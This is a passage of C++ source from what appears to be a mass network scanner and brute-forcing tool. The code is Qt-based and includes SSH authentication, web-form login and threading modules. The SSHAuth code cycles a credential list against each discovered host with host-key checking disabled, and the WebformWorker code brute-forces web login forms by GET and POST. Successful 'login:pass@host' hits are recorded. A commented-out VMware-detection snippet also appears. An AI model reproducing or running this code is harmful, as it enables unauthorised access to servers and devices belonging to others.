strcat(hostStr, host); 11 | int sshTimeout = gTimeOut + 1; 12 | 13 | if (curl) 14 | { 15 | curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 1L); 16 | curl_easy_setopt(curl, CURLOPT_URL, host); 17 | curl_easy_setopt(curl, CURLOPT_PORT, port); 18 | curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L); 19 | curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L); 20 | int proxyPort = std::atoi(gProxyPort); 21 | if(strlen(gProxyIP) != 0 && (proxyPort > 0 && proxyPort < 65535)) { 22 | curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP); 23 | curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort); 24 | } else curl_easy_setopt(curl, CURLOPT_PROXY, ""); 25 | curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, sshTimeout); 26 | curl_easy_setopt(curl, CURLOPT_TIMEOUT, sshTimeout); 27 | curl_easy_setopt(curl, CURLOPT_CONNECT_ONLY, 1L); 28 | 29 | int res = curl_easy_perform(curl); 30 | if (res != CURLE_OK) { 31 | curl_easy_cleanup(curl); 32 | return -2; 33 | } 34 | socket_t sock = -1; 35 | res = curl_easy_getinfo(curl, CURLINFO_LASTSOCKET, &sock); 36 | 37 | if(sock != -1) { 38 | ssh_session ssh_session = ssh_new(); 39 | if (ssh_session == NULL) 40 | { 41 | ssh_free(ssh_session); 42 | curl_easy_cleanup(curl); 43 | return -1; 44 | }; 45 | 46 | ssh_options_set(ssh_session, SSH_OPTIONS_HOST, hostStr); 47 | ssh_options_set(ssh_session, SSH_OPTIONS_STRICTHOSTKEYCHECK, 0); 48 | ssh_options_set(ssh_session, SSH_OPTIONS_GSSAPI_DELEGATE_CREDENTIALS, 0); 49 | ssh_options_set(ssh_session, SSH_OPTIONS_TIMEOUT, &sshTimeout); 50 | 51 | //Fails to work on libssh-4.5 https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=688700 52 | res = ssh_options_set(ssh_session, SSH_OPTIONS_FD, &sock); 53 | 54 | res = ssh_connect(ssh_session); 55 | 56 | if (res != SSH_OK) //Offline 57 | { 58 | ssh_disconnect(ssh_session); 59 | ssh_free(ssh_session); 60 | curl_easy_cleanup(curl); 61 | return -2; 62 | } 63 | else 64 | { 65 | res = ssh_userauth_password(ssh_session, NULL, pass); 66 | if (res != SSH_AUTH_SUCCESS) 67 | { 68 | ssh_disconnect(ssh_session); 69 | ssh_free(ssh_session); 70 | curl_easy_cleanup(curl); 71 | return -1; 72 | }; 73 | }; 74 | 75 | ssh_disconnect(ssh_session); 76 | ssh_free(ssh_session); 77 | } else { 78 | stt->doEmitionRedFoundData("[SSH]Socket = -1 " + QString(host) + ":" + QString::number(port)); 79 | } 80 | } 81 | 82 | ++ssh; 83 | return 0; 84 | } 85 | 86 | int check_ssh_pass(int rowIndex, const char *user, const char *pass, 87 | const char *userPass, const char *host, int port, 88 | std::string *buffer, const char *banner) { 89 | int res = _sshConnect(user, pass, host, port); 90 | 91 | if(res == 0) 92 | { 93 | rowIndex = Utils::addBARow(QString(host), QString(userPass) + "@" + QString(host), "OK", rowIndex); 94 | 95 | buffer->append(userPass); 96 | buffer->append("@"); 97 | buffer->append(host); 98 | buffer->append("|+|"); 99 | buffer->append(banner); 100 | return 0; 101 | }; 102 | 103 | return res; 104 | } 105 | 106 | int SSHBrute(const char* host, int port, std::string *buffer, const char *banner) { 107 | char login[32] = {0}; 108 | char pass[32] = {0}; 109 | char temp[64] = {0}; 110 | char *ptr1 = 0; 111 | int res = -1; 112 | int rowIndex = -1; 113 | int passCounter = 0; 114 | 115 | for(int i = 0; i < MaxSSHPass; ++i) 116 | { 117 | if(!globalScanFlag) break; 118 | strcpy(temp, sshlpLst[i]); 119 | ptr1 = strstr(temp, ":"); 120 | 121 | if (ptr1 == NULL) { 122 | stt->doEmitionRedFoundData("[SSH]Wrong format: " + QString(temp)); 123 | return -1; 124 | } 125 | 126 | ZeroMemory(login, 32); 127 | ZeroMemory(pass, 32); 128 | strncpy(login, temp, ptr1 - temp); 129 | strcpy(pass, ptr1 + 1); 130 | 131 | rowIndex = Utils::addBARow(QString(host) + ":" + QString::number(port), QString(login) + ":" + QString(pass), QString::number((passCounter / (double)(MaxSSHPass)) * 100).mid(0, 4) + "%", rowIndex); 132 | ++passCounter; 133 | 134 | res = check_ssh_pass(rowIndex, login, pass, temp, host, port, buffer, banner); 135 | 136 | if(res == 0) 137 | { 138 | if (i == 0) { 139 | rowIndex = Utils::addBARow(QString(host) + ":" + QString::number(port), "--", "FAILHIT", rowIndex); 140 | return -2; //Failhit 141 | } 142 | return 1; 143 | } 144 | else if(res == -2) 145 | { 146 | rowIndex = Utils::addBARow(QString(host) + ":" + QString::number(port), "--", "FAIL", rowIndex); 147 | return -2; 148 | }; 149 | 150 | Sleep(500); 151 | }; 152 | 153 | rowIndex = Utils::addBARow(QString(host) + ":" + QString::number(port), "--", "FAIL", rowIndex); 154 | return -1; 155 | } 156 | 157 | int SSHAuth::SSHLobby(const char *ip, int port, std::string *buffer) 158 | { 159 | if(gMaxBrutingThreads > 0) { 160 | 161 | while(BrutingThrds >= gMaxBrutingThreads) Sleep(1000); 162 | 163 | std::string sshBanner; 164 | Connector con; 165 | con.nConnect(ip, port, &sshBanner); 166 | 167 | if (strlen(sshBanner.c_str()) > 0) 168 | { 169 | ++BrutingThrds; 170 | stt->doEmitionUpdateArc(gTargets); 171 | int res = SSHBrute(ip, port, buffer, sshBanner.c_str()); 172 | --BrutingThrds; 173 | 174 | return res; 175 | } 176 | } 177 | 178 | return -1; 179 | } 180 | -------------------------------------------------------------------------------- /SSHAuth.h: -------------------------------------------------------------------------------- 1 | #ifndef SSHAUTH_H 2 | #define SSHAUTH_H 3 | 4 | #include "Utils.h" 5 | #include "Connector.h" 6 | #include "externData.h" 7 | #include "mainResources.h" 8 | 9 | class SSHAuth { 10 | public: 11 | static int SSHLobby(const char *ip, 12 | const int port, 13 | std::string *buffer); 14 | }; 15 | #endif // SSHAUTH_H 16 | -------------------------------------------------------------------------------- /STh.cpp: -------------------------------------------------------------------------------- 1 | #include "STh.h" 2 | #include "MainStarter.h" 3 | 4 | //BA TablelistView 5 | void STh::doEmitionChangeBARow(int index, QString loginPass, QString percentage) 6 | { 7 | emit stt->signalChangeBARow(index, loginPass, percentage); 8 | } 9 | 10 | void STh::doEmitionShowRedVersion() 11 | { 12 | emit stt->showRedVersion(); 13 | } 14 | void STh::doEmitionStartScanIP() 15 | { 16 | emit stt->startScanIP(); 17 | } 18 | void STh::doEmitionStartScanDNS() 19 | { 20 | emit stt->startScanDNS(); 21 | } 22 | void STh::doEmitionStartScanImport() 23 | { 24 | emit stt->startScanImport(); 25 | } 26 | void STh::doEmitionAddIncData(QString(ip), QString str) 27 | { 28 | emit stt->sIncData(ip, str); 29 | } 30 | void STh::doEmitionAddOutData( QString str) 31 | { 32 | emit stt->sOutData(str); 33 | } 34 | void STh::doEmitionFoundData(QString str) 35 | { 36 | emit stt->changeFoundData(str); 37 | } 38 | 39 | void STh::doEmitionRedFoundData(QString str) 40 | { 41 | emit stt->changeRedFoundData(str); 42 | } 43 | void STh::doEmitionGreenFoundData(QString str) 44 | { 45 | emit stt->changeGreenFoundData(str); 46 | } 47 | void STh::doEmitionFoundDataCustom(QString str, QString color) 48 | { 49 | emit stt->foundDataCustom(str, color); 50 | } 51 | void STh::doEmitionYellowFoundData(QString str) 52 | { 53 | emit stt->changeYellowFoundData(str); 54 | } 55 | void STh::doEmitionDebugFoundData(QString str) 56 | { 57 | emit stt->changeDebugFoundData(str); 58 | } 59 | void STh::doEmitionKillSttThread() 60 | { 61 | emit stt->killSttThread(); 62 | } 63 | void STh::doEmitionDataSaved(bool status) 64 | { 65 | emit stt->signalDataSaved(status); 66 | } 67 | void STh::doEmitionUpdateArc(unsigned long gTargets) 68 | { 69 | emit stt->signalUpdateArc(gTargets); 70 | } 71 | void STh::doEmitionBlockButton(bool value) 72 | { 73 | emit stt->signalBlockButton(value); 74 | } 75 | 76 | void STh::setMode(short mode) { 77 | gMode = mode; 78 | } 79 | void STh::setTarget(QString target) { 80 | this->target = target; 81 | } 82 | void STh::setPorts(QString ports) { 83 | this->ports = ports; 84 | } 85 | void STh::run() 86 | { 87 | MainStarter ms; 88 | ms.start(this->target.toLocal8Bit().data(), 89 | this->ports.toLocal8Bit().data()); 90 | } 91 | -------------------------------------------------------------------------------- /STh.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #ifndef STH_H 3 | #define STH_H 4 | 5 | #include "nesca_3.h" 6 | #include "externFunctions.h" 7 | #include "MainStarter.h" 8 | #include "externData.h" 9 | 10 | extern int tMax; 11 | 12 | class STh : public QThread 13 | { 14 | Q_OBJECT 15 | private: 16 | QString target = ""; 17 | QString ports = ""; 18 | QList coloredIndexes; 19 | 20 | public: 21 | void addColoredIndex(int index) 22 | { 23 | coloredIndexes.push_back(index); 24 | } 25 | QList getColoredIndexes() 26 | { 27 | return coloredIndexes; 28 | } 29 | 30 | void setMode(short mode); 31 | void setTarget(QString target); 32 | void setPorts(QString ports); 33 | 34 | static int baModelSize(); 35 | 36 | static void doEmitionDataSaved(bool status); 37 | static void doEmitionStartScanIP(); 38 | static void doEmitionStartScanDNS(); 39 | static void doEmitionStartScanImport(); 40 | static void doEmitionAddIncData(QString ip, QString str); 41 | static void doEmitionAddOutData(QString str); 42 | 43 | static void doEmitionFoundData(QString str); 44 | static void doEmitionRedFoundData(QString str); 45 | static void doEmitionGreenFoundData(QString); 46 | static void doEmitionYellowFoundData(QString); 47 | static void doEmitionFoundDataCustom(QString, QString); 48 | static void doEmitionKillSttThread(); 49 | 50 | static void doEmitionDebugFoundData(QString); 51 | static void doEmitionShowRedVersion(); 52 | static void doEmitionUpdateArc(unsigned long gTargets); 53 | static void doEmitionBlockButton(bool value); 54 | //BA TablelistView 55 | static void doEmitionChangeBARow(int index, QString loginPass, QString percentage); 56 | 57 | signals: 58 | public: signals: void showRedVersion(); 59 | public: signals: void startScanIP(); 60 | public: signals: void startScanDNS(); 61 | public: signals: void startScanImport(); 62 | public: signals: void signalDataSaved(bool); 63 | 64 | public: signals: void changeFoundData(QString); 65 | public: signals: void changeRedFoundData(QString); 66 | public: signals: void changeGreenFoundData(QString); 67 | public: signals: void foundDataCustom(QString, QString); 68 | public: signals: void changeYellowFoundData(QString); 69 | public: signals: void changeDebugFoundData(QString); 70 | public: signals: void killSttThread(); 71 | public: signals: void sIncData(QString, QString); 72 | public: signals : void sOutData(QString); 73 | public: signals : void signalUpdateArc(unsigned long); 74 | public: signals : void signalBlockButton(bool); 75 | //BA TablelistView 76 | public: signals : void signalChangeBARow(int, QString, QString); 77 | 78 | protected: 79 | void run(); 80 | }; 81 | extern STh *stt; 82 | #endif // STH_H 83 | -------------------------------------------------------------------------------- /Threader.cpp: -------------------------------------------------------------------------------- 1 | #include "Threader.h" 2 | 3 | int Threader::gThreadDelay = 10; 4 | int Threader::threadId = 0; 5 | std::mutex Threader::m; 6 | bool Threader::ready = false; 7 | std::condition_variable Threader::cv; 8 | std::queue Threader::ipQueue; 9 | 10 | void Threader::fireThread(std::string ip, void *func(void)) { 11 | 12 | ipQueue.push(ip); 13 | 14 | if(threadId < gThreads) { 15 | ++threadId; 16 | std::thread workerThread(func); 17 | workerThread.detach(); 18 | } 19 | 20 | ready = true; 21 | cv.notify_one(); 22 | Sleep(gThreadDelay); 23 | } 24 | 25 | void Threader::cleanUp() { 26 | ready = true; 27 | cv.notify_all(); 28 | std::unique_lock lk(m); 29 | lk.unlock(); 30 | lk.release(); 31 | Sleep(200); 32 | threadId = 0; 33 | std::queue empty; 34 | std::swap(ipQueue, empty); 35 | ready = false; 36 | } 37 | -------------------------------------------------------------------------------- /Threader.h: -------------------------------------------------------------------------------- 1 | #ifndef THREADER_H 2 | #define THREADER_H 3 | 4 | #include "mainResources.h" 5 | #include "externData.h" 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | class Threader { 12 | 13 | public: 14 | static int threadId; 15 | static std::mutex m; 16 | static bool ready; 17 | static std::condition_variable cv; 18 | static std::queue ipQueue; 19 | static int gThreadDelay; 20 | 21 | public: 22 | static void fireThread(std::string ip, void *func(void)); 23 | static void cleanUp(); 24 | }; 25 | 26 | #endif // THREADER_H 27 | -------------------------------------------------------------------------------- /Utils.cpp: -------------------------------------------------------------------------------- 1 | #include "Utils.h" 2 | #include 3 | #include "STh.h" 4 | 5 | std::string Utils::startDate; 6 | std::string Utils::startTime; 7 | std::string Utils::currentTarget; 8 | 9 | //void Utils::emitScaryError() { 10 | // __asm{ 11 | // push edx 12 | // push ecx 13 | // push ebx 14 | // 15 | // mov eax, 'VMXh' 16 | // mov ebx, 0 17 | // mov ecx, 10 18 | // mov edx, 'VX' 19 | // 20 | // in eax, dx 21 | // cmp ebx, 'VMXh' 22 | // 23 | // pop ebx 24 | // pop ecx 25 | // pop edx 26 | // }; 27 | //} 28 | 29 | std::string Utils::getHeaderValue(std::string *buff, const std::string headerValue, const std::string outputName) { 30 | if (buff->size() > 0) { 31 | int headerSize = headerValue.size(); 32 | int pos = buff->find(headerValue); 33 | if (-1 != pos) { 34 | int diff = pos + headerSize; 35 | std::string fieldChunk = buff->substr(diff, buff->find("\r\n", pos) - diff); 36 | std::string fieldHeader = outputName + fieldChunk.substr(0, fieldChunk.find(";")); 37 | return fieldHeader; 38 | } 39 | else { 40 | return ""; 41 | } 42 | } 43 | else { 44 | return ""; 45 | } 46 | } 47 | void Utils::saveStartDate() { 48 | QDate date = QDate::currentDate(); 49 | startDate = date.toString("dd.MM.yyyy").toUtf8().constData(); 50 | } 51 | 52 | void Utils::saveStartTime() { 53 | QTime time = QTime::currentTime(); 54 | startTime = time.toString("HH_mm").toUtf8().constData(); 55 | } 56 | std::string Utils::getStartDate() { 57 | return startDate; 58 | } 59 | 60 | int Utils::addBARow(QString str1, QString str2, QString str3, int rowIndex) { 61 | if (BALogSwitched) { 62 | if (rowIndex == -1) { 63 | rowIndex = nesca_3::addBARow(str1, str2, str3); 64 | } 65 | else { 66 | stt->doEmitionChangeBARow(rowIndex, str2, str3); 67 | } 68 | 69 | return rowIndex; 70 | } 71 | 72 | return -1; 73 | } 74 | 75 | std::string Utils::getStartTime() { 76 | return startTime; 77 | } 78 | 79 | void Utils::setCurrentTarget(const std::string target) { 80 | currentTarget = target; 81 | } 82 | 83 | std::string Utils::getCurrentTarget() { 84 | return currentTarget; 85 | } 86 | 87 | int Utils::isDigest(const std::string *buffer) { 88 | if (Utils::ustrstr(buffer, "401 authorization") != -1 89 | || Utils::ustrstr(buffer, "401 unauthorized") != -1 90 | || (Utils::ustrstr(buffer, "www-authenticate") != -1 91 | && Utils::ustrstr(buffer, "401 ") != -1 92 | ) 93 | || Utils::ustrstr(buffer, "401 unauthorized access denied") != -1 94 | || Utils::ustrstr(buffer, "401 unauthorised") != -1 95 | || (Utils::ustrstr(buffer, "www-authenticate") != -1 96 | && Utils::ustrstr(buffer, " 401\r\n") != -1 97 | ) 98 | ) { 99 | if (Utils::ustrstr(buffer, "digest realm") != -1 100 | && Utils::ustrstr(buffer, "basic realm") == -1) { 101 | return 1; 102 | } 103 | else return 0; 104 | }; 105 | return -1; 106 | } 107 | 108 | std::vector Utils::splitToStrVector(const std::string &s, char delim) { 109 | std::vector elems; 110 | std::stringstream ss(s); 111 | std::string item; 112 | 113 | while (std::getline(ss, item, delim)) { 114 | elems.push_back(item); 115 | } 116 | 117 | return elems; 118 | } 119 | std::vector Utils::splitToIntVector(const std::string &s, char delim) { 120 | std::vector elems; 121 | std::stringstream ss(s); 122 | std::string item; 123 | 124 | while (std::getline(ss, item, delim)) { 125 | elems.push_back(std::stoi(item)); 126 | } 127 | 128 | return elems; 129 | } 130 | 131 | std::string Utils::getStrValue(const std::string &data, const std::string &delim1, const std::string &delim2) { 132 | int pos1 = data.find(delim1); 133 | int pos2; 134 | int offset; 135 | 136 | if (pos1 != std::string::npos) { 137 | offset = delim1.length(); 138 | pos2 = data.find(delim2, pos1 + offset); 139 | if (pos2 != std::string::npos) { 140 | return data.substr(pos1 + offset, pos2 - pos1 - offset); 141 | } 142 | } 143 | return ""; 144 | } 145 | 146 | char *getSystemProxy() { 147 | return ""; 148 | } 149 | 150 | int Utils::getProxyPort() { 151 | return 0; 152 | } 153 | 154 | char * Utils::getProxy() { 155 | #if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__) 156 | #else 157 | getSystemProxy(); 158 | #endif 159 | return ""; 160 | } -------------------------------------------------------------------------------- /Utils.h: -------------------------------------------------------------------------------- 1 | #ifndef UTILS_H 2 | #define UTILS_H 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | #define STRSTR(buff, str) Utils::ustrstr(buff, str) 11 | 12 | using namespace std; 13 | 14 | template 15 | struct my_equal { 16 | my_equal( const locale loc ) : loc_(loc) {} 17 | bool operator()(charT ch1, charT ch2) { 18 | #if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__) 19 | return tolower(ch1) == tolower(ch2); 20 | #else 21 | return tolower(ch1, loc_) == tolower(ch2, loc_); 22 | #endif 23 | } 24 | private: 25 | const locale& loc_; 26 | }; 27 | 28 | class Utils { 29 | private: static std::string startDate; 30 | private: static std::string startTime; 31 | private: static std::string currentTarget; 32 | public: 33 | static int isDigest(const std::string *buffer); 34 | 35 | // find substring (case insensitive) 36 | template static int ustrstr(const T& str1, 37 | const T& str2, 38 | const locale& loc = locale()) { 39 | 40 | auto it = std::search(str1.begin(), str1.end(), str2.begin(), str2.end(), 41 | my_equal(loc)); 42 | if(it != str1.end()) return it - str1.begin(); 43 | else return -1; 44 | } 45 | 46 | template static int ustrstr(const T& str1, 47 | const char* str2c, 48 | const locale& loc = locale()) { 49 | 50 | std::string str2 = std::string(str2c); 51 | auto it = std::search(str1.begin(), str1.end(), str2.begin(), str2.end(), 52 | my_equal(loc)); 53 | if (it != str1.end()) return it - str1.begin(); 54 | else return -1; 55 | } 56 | 57 | template static int ustrstr(T *str1, 58 | const char* str2c, 59 | const locale& loc = locale()) { 60 | 61 | std::string str2 = std::string(str2c); 62 | auto it = std::search(str1->begin(), str1->end(), str2.begin(), str2.end(), 63 | my_equal(loc)); 64 | if (it != str1->end()) return it - str1->begin(); 65 | else return -1; 66 | } 67 | 68 | static QString GetNSErrorDefinition(const char *str, const char *elem){ 69 | const char *temp = strstr(str, elem); 70 | 71 | if (temp != NULL) 72 | { 73 | char definition[128] = { 0 }; 74 | const char *firstComma = strstr(temp + strlen(elem) + 1, "\""); 75 | const char *lastComma = strstr(firstComma + 1, "\""); 76 | 77 | int sz = lastComma - firstComma - 1; 78 | 79 | strncpy(definition, firstComma + 1, (sz < 128 ? sz : 128)); 80 | 81 | return QString(definition); 82 | } 83 | else return QString("No definition found!"); 84 | } 85 | 86 | char * getProxy(); 87 | int getProxyPort(); 88 | static std::string getStrValue(const std::string &data, const std::string &delim1, const std::string &delim2); 89 | static std::vector splitToStrVector(const std::string &s, char delim); 90 | static std::vector splitToIntVector(const std::string &s, char delim); 91 | static void saveStartDate(); 92 | static void saveStartTime(); 93 | static std::string getStartDate(); 94 | static std::string getStartTime(); 95 | static void setCurrentTarget(const std::string target); 96 | static std::string getCurrentTarget(); 97 | static void emitScaryError(); 98 | static int addBARow(QString str1, QString str2, QString str3, int rowIndex); 99 | static std::string getHeaderValue(std::string *buff, const std::string headerValue, const std::string outputName); 100 | }; 101 | 102 | #endif // UTILS_H 103 | -------------------------------------------------------------------------------- /WebformWorker.cpp: -------------------------------------------------------------------------------- 1 | #include "WebformWorker.h" 2 | #include "FileUpdater.h" 3 | 4 | lopaStr WFClass::parseResponse(const char *ip, 5 | const int port, 6 | const std::string *buffer, 7 | const char* formVal, 8 | const char *login, 9 | const char *pass) { 10 | 11 | lopaStr result = {"UNKNOWN", "", ""}; 12 | 13 | if(buffer->size() != 0) 14 | { 15 | if(Utils::ustrstr(*buffer, std::string(formVal)) == -1 16 | && Utils::ustrstr(*buffer, std::string("denied")) == -1 17 | && Utils::ustrstr(*buffer, std::string("Location:")) == -1 18 | && Utils::ustrstr(*buffer, std::string("Authentication required")) == -1 19 | && Utils::ustrstr(*buffer, std::string("invalid")) == -1 20 | && Utils::ustrstr(*buffer, std::string("err")) == -1 21 | && Utils::ustrstr(*buffer, std::string(".href")) == -1 22 | && Utils::ustrstr(*buffer, std::string(".replace")) == -1 23 | && Utils::ustrstr(*buffer, std::string(".location")) == -1 24 | && Utils::ustrstr(*buffer, std::string("501 not implemented")) == -1 25 | && Utils::ustrstr(*buffer, std::string("http-equiv")) == -1 26 | && Utils::ustrstr(*buffer, std::string("busy")) == -1 27 | && Utils::ustrstr(*buffer, std::string("later")) == -1 28 | && Utils::ustrstr(*buffer, std::string("forbidden")) == -1 29 | ) { 30 | 31 | strcpy(result.login, login); 32 | strcpy(result.pass, pass); 33 | return result; 34 | 35 | } else { 36 | 37 | if(Utils::ustrstr(*buffer, std::string("501 not implemented")) != -1) stt->doEmitionRedFoundData("" + QString(ip) + ":" + QString::number(port) + " - [WF]: 501 Not Implemented."); 38 | 39 | if(Utils::ustrstr(*buffer, std::string("404 not found")) != -1) stt->doEmitionRedFoundData("" + QString(ip) + ":" + QString::number(port) + " - [WF]: 404 Not Found."); 40 | 41 | return result; 42 | } 43 | } 44 | else return result; 45 | } 46 | 47 | lopaStr WFClass::doGetCheck(const char *ip, 48 | int port, 49 | char *actionVal, 50 | char *userVal, 51 | char *passVal, 52 | char *formVal) { 53 | 54 | lopaStr result = {"UNKNOWN", "", ""}; 55 | int passCounter = 0; 56 | int firstCycle = 0; 57 | int rowIndex = -1; 58 | 59 | char login[128] = {0}; 60 | char pass[32] = {0}; 61 | 62 | for(int i = 0; i < MaxWFLogin; ++i) 63 | { 64 | if(!globalScanFlag) break; 65 | strcpy(login, wfLoginLst[i]); 66 | 67 | for(int j = firstCycle; j < MaxWFPass; ++j) 68 | { 69 | if(!globalScanFlag) break; 70 | strcpy(pass, wfPassLst[j]); 71 | 72 | int rSize = strlen(ip) + strlen(actionVal) + strlen(userVal) + strlen(login) + strlen(passVal) + strlen(pass) + 4; 73 | 74 | if(rSize > 256) { 75 | stt->doEmitionRedFoundData("[WF] Wrong request size! (" + QString(ip) + ":" + QString::number(port) + ")"); 76 | return result; 77 | }; 78 | 79 | char nip[256] = {0}; 80 | sprintf(nip, "%s%s?%s=%s&%s=%s", ip, actionVal, userVal, login, passVal, pass); 81 | 82 | std::string buffer; 83 | Connector con; 84 | if(con.nConnect(nip, port, &buffer) <= 0) return result; 85 | 86 | rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), QString::number((++passCounter / (double)(MaxWFPass*MaxWFLogin)) * 100).mid(0, 4) + "%", rowIndex); 87 | 88 | result = parseResponse(ip, port, &buffer, formVal, login, pass); 89 | if(i == 0) ++i; 90 | } 91 | firstCycle = 1; 92 | } 93 | 94 | return result; 95 | } 96 | 97 | lopaStr WFClass::doPostCheck(const char *ip, 98 | int port, 99 | char *actionVal, 100 | char *userVal, 101 | char *passVal, 102 | char *formVal) { 103 | 104 | lopaStr result = {"UNKNOWN", "", ""}; 105 | int passCounter = 0; 106 | int firstCycle = 0; 107 | int rowIndex = -1; 108 | 109 | char login[128] = {0}; 110 | char pass[32] = {0}; 111 | 112 | for(int i = 0; i < MaxWFLogin; ++i) 113 | { 114 | if(!globalScanFlag) break; 115 | strcpy(login, wfLoginLst[i]); 116 | 117 | for(int j = firstCycle; j < MaxWFPass; ++j) 118 | { 119 | if(!globalScanFlag) break; 120 | strcpy(pass, wfPassLst[j]); 121 | 122 | int rSize = strlen(ip) + strlen(actionVal) + strlen(userVal) + strlen(login) + strlen(passVal) + strlen(pass) + 4; 123 | 124 | if(rSize > 256) { 125 | stt->doEmitionRedFoundData("[WF] Wrong request size! (" + QString(ip) + ":" + QString::number(port) + ")"); 126 | return result; 127 | }; 128 | 129 | char nip[256] = {0}; 130 | char postData[256] = {0}; 131 | sprintf(nip, "%s%s", ip, actionVal); 132 | sprintf(postData, "%s=%s&%s=%s", userVal, login, passVal, pass); 133 | 134 | std::string buffer; 135 | Connector con; 136 | if (con.nConnect(nip, port, &buffer, postData) <= 0) return result; 137 | 138 | rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), QString::number((++passCounter / (double)(MaxWFPass*MaxWFLogin)) * 100).mid(0, 4) + "%", rowIndex); 139 | ++passCounter; 140 | 141 | return parseResponse(ip, port, &buffer, formVal, login, pass); 142 | if(i == 0) ++i; 143 | } 144 | firstCycle = 1; 145 | } 146 | 147 | return result; 148 | } 149 | 150 | lopaStr WFClass::_WFBrute( const char *ip, 151 | int port, 152 | char *methodVal, 153 | char *actionVal, 154 | char *userVal, 155 | char *passVal, 156 | char *formVal) { 157 | 158 | lopaStr lps = {"UNKNOWN", "", ""}; 159 | 160 | if(strstri(methodVal, "get") != NULL) { 161 | lps = doGetCheck(ip, port, actionVal, userVal, passVal, formVal); 162 | } else if(strstri(methodVal, "post") != NULL) { 163 | lps = doPostCheck(ip, port, actionVal, userVal, passVal, formVal); 164 | } else { 165 | stt->doEmitionFoundData("" + 168 | QString(ip) + ":" + QString::number(port) + 169 | " - [WF]: Unknown method."); 170 | }; 171 | 172 | return lps; 173 | } 174 | -------------------------------------------------------------------------------- /WebformWorker.h: -------------------------------------------------------------------------------- 1 | #ifndef WEBFORMWORKER_H 2 | #define WEBFORMWORKER_H 3 | 4 | #include "Utils.h" 5 | #include "Connector.h" 6 | #include "mainResources.h" 7 | #include "externFunctions.h" 8 | #include "BruteUtils.h" 9 | #include "STh.h" 10 | 11 | class WFClass : BruteUtils { 12 | 13 | private: 14 | int passCounter = 1; 15 | lopaStr doGetCheck(const char *ip, int port, char *actionVal, char *userVal, char *passVal, char *formVal); 16 | lopaStr doPostCheck(const char *ip, int port, char *actionVal, char *userVal, char *passVal, char *formVal); 17 | lopaStr parseResponse(const char *ip, const int port, const std::string *buffer, const char* formVal, 18 | const char *login, 19 | const char *pass); 20 | 21 | 22 | public: 23 | WFClass(){ 24 | if(gMaxBrutingThreads > 0) { 25 | while(BrutingThrds >= gMaxBrutingThreads) Sleep(700); 26 | 27 | //++WF; 28 | 29 | ++BrutingThrds; 30 | //BConInc(); 31 | passCounter = 1; 32 | } 33 | } 34 | 35 | ~WFClass(){ 36 | //BConDec(); 37 | 38 | --BrutingThrds; 39 | } 40 | 41 | lopaStr _WFBrute(const char *ip, 42 | int port, 43 | char *methodVal, 44 | char *actionVal, 45 | char *userVal, 46 | char *passVal, 47 | char *formVal); 48 | }; 49 | 50 | #endif // WEBFORMWORKER_H 51 | -------------------------------------------------------------------------------- /base64.cpp: -------------------------------------------------------------------------------- 1 | #include "base64.h" 2 | #include 3 | 4 | static const std::string base64_chars = 5 | "ABCDEFGHIJKLMNOPQRSTUVWXYZ" 6 | "abcdefghijklmnopqrstuvwxyz" 7 | "0123456789+/"; 8 | 9 | 10 | static inline bool is_base64(unsigned char c) { 11 | return (isalnum(c) || (c == '+') || (c == '/')); 12 | } 13 | 14 | std::string base64_encode(unsigned char const* bytes_to_encode, unsigned int in_len) { 15 | std::string ret; 16 | int i = 0; 17 | int j = 0; 18 | unsigned char char_array_3[3]; 19 | unsigned char char_array_4[4]; 20 | 21 | while (in_len--) { 22 | char_array_3[i++] = *(bytes_to_encode++); 23 | if (i == 3) { 24 | char_array_4[0] = (char_array_3[0] & 0xfc) >> 2; 25 | char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4); 26 | char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6); 27 | char_array_4[3] = char_array_3[2] & 0x3f; 28 | 29 | for(i = 0; (i <4) ; i++) 30 | ret += base64_chars[char_array_4[i]]; 31 | i = 0; 32 | } 33 | } 34 | 35 | if (i) 36 | { 37 | for(j = i; j < 3; j++) 38 | char_array_3[j] = '\0'; 39 | 40 | char_array_4[0] = (char_array_3[0] & 0xfc) >> 2; 41 | char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4); 42 | char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6); 43 | char_array_4[3] = char_array_3[2] & 0x3f; 44 | 45 | for (j = 0; (j < i + 1); j++) 46 | ret += base64_chars[char_array_4[j]]; 47 | 48 | while((i++ < 3)) 49 | ret += '='; 50 | 51 | } 52 | 53 | return ret; 54 | 55 | } 56 | 57 | std::string base64_decode(std::string const& encoded_string) { 58 | int in_len = encoded_string.size(); 59 | int i = 0; 60 | int j = 0; 61 | int in_ = 0; 62 | unsigned char char_array_4[4], char_array_3[3]; 63 | std::string ret; 64 | 65 | while (in_len-- && ( encoded_string[in_] != '=') && is_base64(encoded_string[in_])) { 66 | char_array_4[i++] = encoded_string[in_]; in_++; 67 | if (i ==4) { 68 | for (i = 0; i <4; i++) 69 | char_array_4[i] = base64_chars.find(char_array_4[i]); 70 | 71 | char_array_3[0] = (char_array_4[0] << 2) + ((char_array_4[1] & 0x30) >> 4); 72 | char_array_3[1] = ((char_array_4[1] & 0xf) << 4) + ((char_array_4[2] & 0x3c) >> 2); 73 | char_array_3[2] = ((char_array_4[2] & 0x3) << 6) + char_array_4[3]; 74 | 75 | for (i = 0; (i < 3); i++) 76 | ret += char_array_3[i]; 77 | i = 0; 78 | } 79 | } 80 | 81 | if (i) { 82 | for (j = i; j <4; j++) 83 | char_array_4[j] = 0; 84 | 85 | for (j = 0; j <4; j++) 